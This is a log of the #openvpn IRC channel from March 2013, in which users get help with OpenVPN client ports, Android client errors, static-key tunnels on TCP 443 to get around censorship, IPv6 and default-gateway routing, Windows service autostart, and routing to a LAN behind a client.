16:45 < rob0> I'd guess "yes, no." So you'd ask the ISP for another account.
16:45 < rob0> or, if both are at the same site, route the second one's traffic through the one which is connected to the VPN.
17:14 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has quit [Ping timeout: 260 seconds]
17:31 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
17:33 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds]
17:34 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
17:44 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
17:44 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 252 seconds]
17:45 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
17:46 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
17:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds]
17:59 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has joined #openvpn
17:59 < _d4vid> hi again
17:59 < _d4vid> how to set openvpn for specific port?
17:59 < _d4vid> like 80
18:00 < _d4vid> i mean client config
18:01 < pekster> _d4vid: You can add the port to the end of the --remote command after the target IP/host, or use the --rport. Use of --port implies both --rport and --lport, unless you also specify --nobind
18:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
18:41 -!- master_o1_master [~master_of@p4FF24D9B.dip.t-dialin.net] has joined #openvpn
18:44 -!- master_of_master [~master_of@p4FF2495D.dip.t-dialin.net] has quit [Ping timeout: 240 seconds]
19:33 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
19:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
20:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
20:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds]
21:03 -!- m0r0n|3 [~kvirc@dsl-67-55-0-106.acanac.net] has quit [Ping timeout: 264 seconds]
21:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
21:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
21:27 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection]
21:28 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn
21:28 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Read error: Connection reset by peer]
21:29 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn
21:37 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection]
21:41 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host]
21:41 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
21:49 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host]
21:50 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn
21:50 -!- mode/#openvpn [+v hazardous] by ChanServ
22:04 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 246 seconds]
22:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
22:20 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
22:23 -!- edwardly [~edwardly@cpe-72-190-113-138.tx.res.rr.com] has joined #openvpn
22:27 < edwardly> Hi, I'm trying to use the Android OpenVPN client, but I keep getting an error about remote_host not being a correct IP for the gateway. Does OpenVPN for Android require root or something else set up for it to work?
22:27 < edwardly> The error: error parsing ipv4 route: [route] [remote_host] [255.255.255.255] [net_gateway] : addr_pair_mask_parse_error: AddrMaskPair parse error 'route': remote_host/255.255.255.255 : ip_parse_exception: error parsing route IP address 'remote_hos...
22:28 < edwardly> It cuts off the rest. If you'd like the config I can get that as well, just will take a bit, and I'm not sure if it's needed if it's just that I need to root my Nexus 7.
22:38 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn
22:43 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection]
22:43 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn
22:50 < pppingme> edwardly what version android you running?
22:50 < pppingme> and what do you have as the address for the remote server?
22:50 < edwardly> 4.2.2
22:51 < edwardly> It's an ovpn file someone else generated
22:51 < edwardly> remote vpn.limestonenetworks.com 1195
22:53 < pppingme> are you trying to use a tun or tap interface?
22:53 < edwardly> I am trying to use OpenVPN connect. It looks like it is attempting to use a TUN interface
22:54 < edwardly> Sorry, I missed the start of the error: Tuninterface setup failed: tun_builder_error: and then the rest
22:55 < pppingme> hmm I don't know the android client that well, but the two big things are it needs something above 4 on the android side, which you are, and it only works over tun, not tap, which you think you're doing..
22:55 < edwardly> Also, I mean what I said as I'm trying to use OpenVPN connect for android, so I don't know where I'd even change between tun or tap
22:56 < pppingme> the server is also setup for tun, right?
22:57 < pppingme> not just the client..
23:03 -!- newbie|4 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Quit: quit irc]
23:03 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
23:05 < edwardly> Yes, the server is set up for tun
23:24 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer]
23:24 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn
23:27 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection]
23:30 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Remote host closed the connection]
--- Day changed Sun Mar 17 2013
00:00 -!- AlbinoGeek [AcademyInt@S0106602ad0846dde.vs.shawcable.net] has joined #openvpn
00:00 < AlbinoGeek> Quick question, concerning the whole "add keys" section of the man; if I already have users, which commands do I __NOT__ run (to not delete the current CA, etc?)
00:02 < AlbinoGeek> Nevermind, got it; just need to skip the CA stuff and it uses the existing ones.
00:02 -!- AlbinoGeek [AcademyInt@S0106602ad0846dde.vs.shawcable.net] has left #openvpn ["I need a new part message."]
00:15 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has quit [Ping timeout: 252 seconds]
00:24 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving]
00:39 < edwardly> I had to use the OpenVPN for Android package, the OpenVPN Connect one which is the official doesn't work with remote_host I guess?
00:40 -!- ddlk [~ddlk@115.211.187.28] has joined #openvpn
00:40 < ddlk> Anybody has experience with tunneling OpenVPN with Stunnel?
00:41 < ddlk> my vpn client can reach the stunnel server via stunnel client, but cannot establish the connection with vpn server
00:45 < pppingme> why are you trying to use OpenVPN with stunnel?
00:46 < pppingme> OpenVPN already encrypts, there's no need for stunnel
00:49 < ddlk> China gov has the ability to block OpenVPN connection
00:50 < ddlk> Have to use standard SSL to connect to port 443 to establish the connection
00:50 < pppingme> run it on a different port, and possibly with tcp instead of udp
00:51 < ddlk> the stunnel server must listen on 443, as I said. I think it's iptables issue, cannot figure out how to config it
00:52 < pppingme> its generally not a good thing to run encryption over encryption, its just going to give you headaches
00:52 < pppingme> just run openvpn over 443
00:53 < ddlk> Already tried that, openvpn on port 443 with TCP, no luck
00:54 < ddlk> nothing can give me more headaches than cannot use google
00:54 < pppingme> keep it simple, don't complicate it, thats why you're having so many problems troubleshooting it
00:54 < ddlk> Any suggestions?
00:54 < pppingme> once you simplify it, come back and ask for help
00:55 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
00:56 < ddlk> it's not complicated at all, just tunneling vpn via stunnel
00:57 < pppingme> I doubt you'll find any help with that mess..
00:57 < pppingme> I've already offered if you dump the **** setup, but if you insist on keeping it, I refuse
00:59 <@EugeneKay> pppingme - it's OK to fucking swear
00:59 <@EugeneKay> We're all(should be) adults here.
00:59 < ddlk> well... I am not ....
01:00 < pppingme> then you need to go ask your mommy and daddy before you get on the big bad computer..
01:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 248 seconds]
01:08 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
01:16 -!- master_of_master [~master_of@p4FF248F1.dip.t-dialin.net] has joined #openvpn
01:19 -!- master_o1_master [~master_of@p4FF24D9B.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
01:36 < pekster> ddlk: OpenVPN in static key over an obscure port should help. Symmetric crypto has no identifying handshake and no protocol to match on
01:36 < pekster> !statickey
01:36 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info
01:37 < pekster> If you want the benefit of Perfect Forward Secrecy over that, you can technically run a TLS VPN over a static tunnel, although if your goal is bypassing censorship in China, a pure static key tunnel may be all you want/need
02:07 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn
02:10 < ddlk> Thanks for the hint, pekster
02:10 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 276 seconds]
02:11 < ddlk> trying that, but I got stuck on the server, the log says: UDPv4 link remote: [undef]
02:16 -!- master_o1_master [~master_of@p4FF2451B.dip.t-dialin.net] has joined #openvpn
02:18 -!- master_of_master [~master_of@p4FF248F1.dip.t-dialin.net] has quit [Read error: Operation timed out]
02:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
02:27 < pekster> ddlk: That's expected for a server that listens for external connections. The remote address is "undefined" in such a situation
02:33 < ddlk> that's to say, at this time I should start the client to connect to the server, right? but when I did so, the client also stuck at UDPv4 blah remote: my_ip
02:43 -!- brute11k [~brute@89.249.231.71] has joined #openvpn
02:43 -!- m0r0n [~kvirc@CPE647002deb0dd-CM001bd71e7460.cpe.net.cable.rogers.com] has joined #openvpn
02:45 -!- master_of_master [~master_of@p4FF24DCF.dip.t-dialin.net] has joined #openvpn
02:46 -!- master_o1_master [~master_of@p4FF2451B.dip.t-dialin.net] has quit [Read error: Operation timed out]
02:57 -!- m0r0n [~kvirc@CPE647002deb0dd-CM001bd71e7460.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds]
03:02 -!- ddlk [~ddlk@115.211.187.28] has quit []
03:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
03:14 -!- ddlk [~ddlk@115.211.187.28] has joined #openvpn
03:14 < ddlk> pekster: finally got it working, have to use the tcp on 443 with static key
03:14 -!- master_o1_master [~master_of@p4FF24CF8.dip.t-dialin.net] has joined #openvpn
03:17 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn
03:18 -!- master_of_master [~master_of@p4FF24DCF.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
03:20 -!- master_of_master [~master_of@p4FF24393.dip.t-dialin.net] has joined #openvpn
03:20 -!- master_o1_master [~master_of@p4FF24CF8.dip.t-dialin.net] has quit [Ping timeout: 248 seconds]
03:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
03:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
03:32 -!- master_o1_master [~master_of@p4FF24A7F.dip.t-dialin.net] has joined #openvpn
03:35 -!- master_of_master [~master_of@p4FF24393.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
03:38 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
03:39 -!- Orbi [~opera@anon-184-194.vpn.ipredator.se] has joined #openvpn
03:50 -!- master_of_master [~master_of@p4FF24D80.dip.t-dialin.net] has joined #openvpn
03:53 -!- master_o1_master [~master_of@p4FF24A7F.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
03:55 -!- fluter [~fluter@fedora/fluter] has joined #openvpn
04:04 -!- master_o1_master [~master_of@p4FF24F40.dip.t-dialin.net] has joined #openvpn
04:05 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 246 seconds]
04:07 -!- master_of_master [~master_of@p4FF24D80.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
04:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
04:17 -!- master_of_master [~master_of@p4FF245AD.dip.t-dialin.net] has joined #openvpn
04:17 < pekster> ddlk: Good to hear. Yea, censorship sucks. With static key it's usually possible to tell that "something" is encrypted, but not what exactly it is. The stream has no definable start or end, nor any handshake; it's literally a bunch of random data
04:19 -!- master_o1_master [~master_of@p4FF24F40.dip.t-dialin.net] has quit [Ping timeout: 240 seconds]
04:20 < jzaw> that sounds like an advantage pekster
04:20 < jzaw> well done ddlk hate big brother
04:20 < pekster> At the expense of multi-client support and the TLS-based re-keying that provides perfect forward secrecy, yes
04:21 < pekster> Usually TLS is considered a "better" option, but static key has its advantages too (like this case)
04:21 * jzaw nods
04:21 < jzaw> btw im slowly adding *features* to my tunnel
04:21 < jzaw> ive got the ends pinging ipv6
04:22 < jzaw> each other
04:22 < jzaw> oh i compiled openvpn-testing
04:22 < pekster> Sure, if you don't mind testing some newer features, it's not a bad way to try out the new code
04:23 < jzaw> :)
04:23 < jzaw> at the mo for ipv4 im def1'ing
04:23 < jzaw> as i want to be able to ssh to at least 1 or 2 clients
04:25 < jzaw> btw pekster in the openvpn faq it strongly suggests using def1 .. out of curiosity why is that suggested over the other option of deleting old default gw and adding the new one ?
04:25 < jzaw> the latter being somewhat less confusing to the eye
04:26 < jzaw> when one does an ip route list
04:26 < jzaw> show
04:28 < pekster> jzaw: If you omit using def1, local DHCP renewal tends to wipe out the gateway again
04:29 < jzaw> ah thats one thing yes
04:29 < pekster> Using two /1 routes prevents any local automated processes like that from interfering with the redirection
04:29 < jzaw> gotcha
04:29 < pekster> Use 2000::/3 in IPv6 for the same effect
04:29 < jzaw> i suppose thats more if the client isnt the remote network's gw though
04:30 < jzaw> since then it would likely be the dhcpd rather than dhcp client
04:30 < jzaw> is my thinking right?
04:31 < pekster> Depends on how the client is configured. It's generally preferred to use the 'def1' feature unless you are sure your local system won't be impacted by gateway changes at any other time
04:31 * jzaw nods
04:32 < jzaw> mine was working well till i rebooted the VM running ovpn server
04:32 < jzaw> then i pulled my hair out for 2 hours trying to get it routing properly again
04:32 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat]
04:32 < jzaw> the only thing id forgotten was to edit /etc/sysctl.conf ... to permanently enable v4 forwarding
04:32 < pekster> You should try to fix that. Assuming you set it all up, you should be able to restart and have any services like that come back on startup
04:32 < jzaw> d'oh
04:32 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
04:33 < jzaw> fixed now ... shant forget that one again
04:33 < jzaw> i can reboot either end now and it all comes back up
04:34 < jzaw> pekster, i know i can send ipv6 down the established ipv4 tunnel
04:34 < jzaw> is it possible to have a purely ipv6 tunnel ?
04:35 < pekster> Using --tun-ipv6 I believe requires an IPv4 address configured as well, although you can just assign some rfc1918 subnet
04:36 < jzaw> for the tun/tap ?
04:36 < pekster> For tun anyway. tap is unaware of higher level protocols like IPv4 or IPv6
04:36 < jzaw> of course
04:37 < jzaw> but the server local ip and client local ... can be ipv6?
04:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
04:37 < pekster> Oh, sure, if you'd like to connect to your peer over IPv6 for the encapsulated packets
04:37 < jzaw> bingo!
04:38 < jzaw> ive mentioned before
04:38 < pekster> So use '--remote 2001:db8:abc::789' or '--remote ipv6.vpn.example.net'
04:38 < jzaw> having dual stack has saved me a couple of times
04:38 < jzaw> most recently ive killed my home lan ipv6 but could ssh in via ipv4 and fix it
04:38 < pekster> You can also just set up DNS to do the right thing and use the hostname. Assuming the client has working dual-stack and a properly configured DNS resolver, it'll all magically work
04:38 < jzaw> vice versa has happened too
04:39 < jzaw> in that case would it tend to prefre ipv6 ?
04:39 < jzaw> prefer
04:39 < pekster> I haven't actually tried that
04:39 < jzaw> or does it do what firefox does ... which responds quicker gets used
04:40 < jzaw> most apps prefer ipv6 if its there .... mtr can be a pain sometimes
04:40 < pekster> I'm dual-stack at home through a v6 broker, and my browser always uses v6 when available, although there's a setting for "fast v4 fallback" that IIRC is enabled by default (for broken IPv6 sites)
04:40 * jzaw nods
04:40 < jzaw> browser = firefox ?
04:40 < pekster> Yea
04:41 < pekster> Not sure about other browsers, although Iron (basically Chrome) seems to prefer v6 too
04:41 < jzaw> i think itll go for ipv4 even if theres ipv6 if v4 responds first
04:41 < pekster> It doesn't try both at once
04:41 < jzaw> it was explained to me that it does
04:41 < pekster> If it gets a quad-A record back, Firefox only initiates a connection to the IPv6 addresses
04:42 < jzaw> maybe we were chatting about a different feature /me shrugs
04:43 < jzaw> so it must have a time out on the v6 and falls back to v4
04:43 < jzaw> but doesnt do both at the same time
04:43 < pekster> Right
04:44 < pekster> I'm just not sure offhand how openvpn handles that. I'll have to set up a test on my internal DNS to assign a test system a v4+v6 address to see what the client does
04:44 < pekster> (but not tonight...)
04:44 < jzaw> :)
04:44 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection]
04:54 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 246 seconds]
04:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
04:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
05:17 -!- master_o1_master [~master_of@p4FF24C06.dip.t-dialin.net] has joined #openvpn
05:21 -!- master_of_master [~master_of@p4FF245AD.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
05:22 -!- A2tec [~Aztec@fightclub.de] has joined #openvpn
05:23 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
05:26 -!- master_of_master [~master_of@p4FF24483.dip.t-dialin.net] has joined #openvpn
05:29 -!- master_o1_master [~master_of@p4FF24C06.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
05:31 -!- JSharpe [~JSharpe@146.185.24.18] has joined #openvpn
05:38 < Dennis84> hi all
05:46 < kisom> Morning
05:48 < Dennis84> Wulf: did you find some time to check the NULL-Pointer?
05:49 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 05:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 05:55 -!- Orbi [~opera@anon-184-194.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 05:55 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 06:31 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:42 -!- ddlk [~ddlk@115.211.187.28] has quit [] 07:18 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 07:39 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds] 07:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 07:41 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:44 -!- p3rror [~mezgani@196.201.78.139] has quit [Ping timeout: 245 seconds] 07:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 07:57 -!- p3rror [~mezgani@41.140.196.35] has joined #openvpn 08:02 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 08:03 < hrenovo> hi. How can I get autovpn to autostart and autoconnect with windows ? 08:03 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 08:05 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 08:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:16 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:22 < hrenovo> hi. How can I get autovpn to autostart and autoconnect with windows ? 08:24 <@ecrist> set it up as a service 08:25 <@EugeneKay> hrenovo - the openvpn installer creates a Windows service named "openvpn". Place your config files into the install dir's "conf" folder, and enable this service. 
08:25 <@EugeneKay> See also the README located inside the same config folder
08:29 < hrenovo> EugeneKay: where is the conf folder ?
08:30 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has left #openvpn ["http://incloak.com"]
08:30 <@EugeneKay> "the install dir's"
08:30 < hrenovo> this is for manual connection right ? C:\Program Files\OpenVPN\config
08:30 <@EugeneKay> Reading; it matters.
08:31 <@EugeneKay> That's the place
08:31 < hrenovo> ok, my config files are there and I am able to connect
08:31 < hrenovo> where is the option to auto start ?
08:31 <@ecrist> in the services control panel
08:31 <@EugeneKay> Go back and read what I said
08:31 <@ecrist> you need to set the openvpn service to auto start
08:31 <@EugeneKay> I'm not going to beat it into you
08:32 < hrenovo> how can I get it to auto start ?
08:32 < hrenovo> openvpn service
08:32 <@EugeneKay> Go back and read what I said
08:32 <@EugeneKay> I'm not going to beat it into you
08:32 -!- hrenovo was kicked from #openvpn by ecrist [please follow directions]
08:32 <@EugeneKay> The stupid is strong today.
08:33 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn
08:34 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has left #openvpn ["I am parting"]
08:35 < rob0> what is "autovpn"?
08:36 <@EugeneKay> I didn't even notice that
09:04 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
09:19 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
09:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
09:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
09:42 -!- Guest18356 [~Terse@ARennes-257-1-41-133.w81-53.abo.wanadoo.fr] has joined #openvpn
09:42 -!- Guest18356 [~Terse@ARennes-257-1-41-133.w81-53.abo.wanadoo.fr] has left #openvpn []
09:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
09:50 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
09:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit]
09:53 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
09:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
09:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
10:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit]
10:22 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds]
10:44 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 245 seconds]
11:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
11:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
11:42 -!- master_o1_master [~master_of@p4FF24D0B.dip.t-dialin.net] has joined #openvpn
11:45 -!- master_of_master [~master_of@p4FF24483.dip.t-dialin.net] has quit [Ping timeout: 245 seconds]
12:06 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has quit [Ping timeout: 264 seconds]
12:07 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
12:10 < jzaw> \0/ yea ipv6 too
12:16 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn
12:19 < Martin`> :)
12:22 -!- siddhant [~chatzilla@64.62.201.17] has joined #openvpn
12:23 -!- siddhant is now known as sisar
13:19 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has left #openvpn ["Leaving IRC forever... :("]
13:24 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has joined #openvpn
13:26 < timmmaaaayyy> anyone want to help me get routing working on my openvpn setup? i cannot hit the LAN behind one of my clients. it's a windows client....i tried using iroute in the client config but it won't start vpn with that
13:26 < timmmaaaayyy> what other options do i have?
13:30 -!- hatschi [~marvin@dslb-178-010-117-249.pools.arcor-ip.net] has joined #openvpn
13:37 < rob0> !clientlan
13:37 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a
13:37 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
13:37 < rob0> check the flowchart
13:39 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
13:40 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
13:41 < timmmaaaayyy> oh so you can't just throw "iroute 192.168.0.0 255.255.255.0" into the config? i'll try using the client-config-dir method
13:42 < pekster> iroute tells openvpn that a specific client is responsible for a particular network
13:42 < pekster> You still need the --route entry in the server too, since --route impacts the OS routing table, while --iroute handles the association of the network to the openvpn client
13:43 < rob0> iroute can only be in a ccd, IIRC
13:44 < pekster> ccd or --client-connect
13:47 -!- hatschi [~marvin@dslb-178-010-117-249.pools.arcor-ip.net] has quit [Ping timeout: 240 seconds]
13:47 < timmmaaaayyy> ok thanks
13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
13:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit]
14:05 < timmmaaaayyy> !ipforward
14:05 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
14:05 < timmmaaaayyy> !winipforward
14:05 <@vpnHelper> "winipforward" is http://support.microsoft.com/kb/315236 to enable ip forwarding on windows
14:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
14:11 < timmmaaaayyy> i have the route entry in the server.conf, but it's not showing up in the OS routing table
14:11 < pekster> Did you restart the server openvpn instance after making the change?
14:12 < timmmaaaayyy> yes
14:12 < pekster> It should show up, or note in the logs why route addition failed
14:13 < timmmaaaayyy> Sun Mar 17 19:13:13 2013 OpenVPN ROUTE: failed to parse/resolve route for host/network: 192.168.0.0
14:15 < pekster> There's usually related context before/after that. Pastebin the full logs if you need help
14:15 < pekster> !paste
14:15 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
14:16 < timmmaaaayyy> http://pastebin.com/MbHZFM8c
14:16 < rob0> 192.168.0.x is not a good idea, BTW :)
14:17 < timmmaaaayyy> this is just temporary.....i'm setting something up that needs access to that subnet. once it's setup, i'm removing the config stuff and mailing it out
14:17 < pekster> Can you paste your config too, ideally with comments removed (see grep magic in next bot output.) Looks like you're using a mode that doesn't imply --route-gateway, or didn't add it yourself and need it
14:17 < pekster> !configs
14:17 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) don't forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
14:18 < rob0> Sun Mar 17 19:14:55 2013 OpenVPN ROUTE: OpenVPN needs a gateway parameter for a --route option and no default was specified by either --route-gateway or --ifconfig options
14:18 < pekster> My guess is you're using --server in topology subnet, and you must manually define it in such a case
14:18 < pekster> But configs will show for sure
14:18 < pekster> rob0: I'm wondering if I should see about patching that; this issue comes up a lot
14:19 < pekster> Despite the warning :\
14:19 < timmmaaaayyy> http://pastebin.com/xjceZs1w
14:19 < timmmaaaayyy> i'd love to clean this up if i can
14:19 < pekster> So simply, --route-gateway 10.8.0.1 will do what you need
14:20 < pekster> That's pushed to clients, but not present for the server, so the server has no target gateway to use for the routes
14:20 < timmmaaaayyy> would that be better? or should i remove topology subnet? i only have like 6 users, so i don't actually need the subnet thing....it just seemed cool
14:23 < rob0> the /30 mess is never useful
14:24 < timmmaaaayyy> i agree. ok i see it in the routing table now....that's good
14:24 < timmmaaaayyy> but i still can't ping the other side of the VPN client itself. it's ip is 192.168.0.13.
14:25 < timmmaaaayyy> i enabled forwarding according to the help docs here
14:25 < timmmaaaayyy> i wish this wasn't a windows machine
14:28 < timmmaaaayyy> http://pastebin.com/QwPwXpMy
